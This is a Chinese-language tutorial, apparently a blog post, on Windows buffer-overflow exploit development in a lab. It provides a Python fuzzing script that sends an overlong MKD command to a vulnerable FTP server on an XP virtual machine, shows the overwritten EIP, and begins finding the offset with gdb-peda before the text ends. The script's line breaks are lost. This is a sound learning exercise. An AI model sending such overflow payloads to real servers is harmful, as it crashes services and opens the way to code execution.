学习链接:https://www.fuzzysecurity.com 根据上面的链接,学习windows exploit
含有漏洞的软件:
链接:https://pan.baidu.com/s/1KoqDfeYn-JTMD2OvkD2ErQ 提取码:yooa
xp 虚拟机为xp sp3 我这里用的是吾爱破解的专用虚拟机
链接:https://pan.baidu.com/s/1MS96hus4sA2FSXdmNjHCDg 提取码:ok57
在xp虚拟机里运行有漏洞的软件,用kali链接上去,简单看一下这个程序有啥功能,这个软件是个简易的ftp服务软件。 这里就先不管这个漏洞是如何挖掘出来的,现在只用知道该软件存在缓冲区溢出漏洞,下面的脚本用于调试该漏洞。
import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('172.16.250.6',21)) def send(content): print 'send:\n'+content s.send(content) def recv(size): print 'recived:' print s.recv(size) evil ='A'*1000 recv(1024) send('USER anonymous\r\n') recv(1024) send('PASS anonymous\r\n') recv(1024) send('MKD ' + evil + '\r\n') recv(1024) send('QUIT\r\n') s.close recv(1024) send('USER anonymous\r\n') recv(1024) send('PASS anonymous\r\n') recv(1024) send('MKD ' + evil + '\r\n') recv(1024) send('QUIT\r\n') s.close首先我们使用Immunity Debugger Attach上这个软件,便于我们观察,栈溢出后的情况。注意attach上去以后要点击运行,也就是那个红色的三角形。 然后运行上面给出的脚本,再查看xp虚拟机里Immunity Debugger的内容,可以发现,eip已经被覆盖成了0x41414141 下面要确定eip的偏移,我这里使用gdb peda插件来生成字符串来确定偏移
gdb-peda$ pattern create 1000 'AAA